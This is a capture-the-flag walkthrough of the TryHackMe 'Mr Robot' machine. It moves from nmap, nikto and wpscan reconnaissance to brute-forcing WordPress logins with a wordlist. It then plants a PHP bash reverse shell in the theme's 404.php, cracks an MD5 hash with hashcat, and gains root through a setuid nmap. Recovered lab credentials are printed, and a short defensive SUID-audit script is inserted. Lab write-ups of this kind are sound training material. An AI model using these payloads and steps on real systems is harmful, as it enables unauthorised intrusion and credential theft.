TryHackMe: Mr Robot CTF

nmap -Pn <ip>

2. All scan

nmap -A -p 22,80,443 <ip>

3. Vulnerability scan

nmap --script vuln -p 22,80,443 <ip>

This is a WordPress site. There's a robots.txt file.

4. Access HTTP site

There are commands that I can try.

prepare
fsociety
inform
question
wakeup
join

Seems like these commands are just for fun.

Viewing source of index page is not useful.

Inspecting elements is not useful either.

5. Access robots.txt

Download fsocity.dic

wget http://<ip>/fsocity.dic
cat fsocity.dic

This file may contain useful passwords.

Count lines of the file

wc -l fsocity.dic

Sort the file and remove duplicates

sort fsocity.dic | uniq > sort_fsocity.dic
wc -l sort_fsocity.dic

Access http://<ip>/key-1-of-3.txt

6. Nikto scan

nikto -h http://<ip>/ -nossl

7. Directory scan

dirb http://<ip>

Seems like it's a WordPress site. Access one of the scanned directories.

http://<ip>/0/

View source, nothing useful.

8. WordPress scan

wpscan --url http://<ip>/0/ -et -ep -eu

Failed

Add another flag as suggestion

wpscan --url http://<ip>/0/ --wp-content-dir -et -ep -eu

There are 2 users: mich05654 and elliot.

9. Bruteforcing WordPress

wpscan --url http://<ip>/0/ --wp-content-dir -eu -P fsocity.dic

Access http://<ip>/wp-login.php

Username -> mich05654:Dylan_2791

Can’t do anything with this user.

Let's try elliot:ER28-0652

On Dashboard -> Users, Elliot is an administrator.

Let's get a reverse shell

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/<ip>/1234 0>&1'");
?>

Go to Appearance -> Editor -> put the code in 404.php

Create a listener

nc -lvp 1234

Access 404.php

Now I have a shell.

cd /home/
ls
cat key-2-of-3.txt

I don't have permission to read key 2.

Read another file. It's robot's credential.

cat password.raw-md5

Crack with hashcat

hashcat -m 0 c3fcd3d76192e4007dfb496cca67e13b ~/Desktop/rockyou.txt
hashcat -m 0 c3fcd3d76192e4007dfb496cca67e13b ~/Desktop/rockyou.txt --show

Change to robot

su robot

Failed. I need a TTY shell.

Spawn a TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

Change to robot

su robot

Read key2

cat key-2-of-3.txt

Let’s do privilege escalation

Check if robot can run sudo.

sudo -l

I can’t run sudo.

Looking for SUID

find / -perm -u=s -type f 2>/dev/null

It's nmap!!!
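The find command above is also the check a defender should run routinely. As an added example (not part of the original write-up), the listing is compared against a baseline of expected setuid binaries so that an unexpected entry, such as a setuid nmap, is reported rather than spotted by eye; the paths and baseline contents are assumptions for the demo.

```shell
#!/bin/sh
# Added example, not part of the original write-up: a defender-side
# SUID audit built on the same find command the write-up uses.
# Baseline format (assumed): one expected path per line, relative to ROOT.

# find_suid ROOT: setuid regular files under ROOT, printed relative to
# ROOT and sorted (-perm -4000 is the numeric form of -perm -u=s).
find_suid() {
    root=$1
    find "$root" -perm -4000 -type f 2>/dev/null \
        | sed "s|^$root||" | sort
}

# unexpected_suid ROOT BASELINE: setuid files under ROOT whose path is
# not an exact line of BASELINE. Empty output means nothing unexpected.
unexpected_suid() {
    find_suid "$1" | grep -vxF -f "$2"
    # grep exits 1 when every file is in the baseline; that is the
    # clean result, so do not let it look like a failure.
    return 0
}

# suid_ok ROOT BASELINE: succeed only when no unexpected setuid file exists
suid_ok() {
    [ -z "$(unexpected_suid "$1" "$2")" ]
}
```

Run it periodically (or from a scheduled job) and alert on any non-empty output, since a setuid binary that can spawn a shell is a direct path to root.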

nmap --interactive
!sh
id

Now I’m root.

cd /root
cat key-3-of-3.txt

ratiros01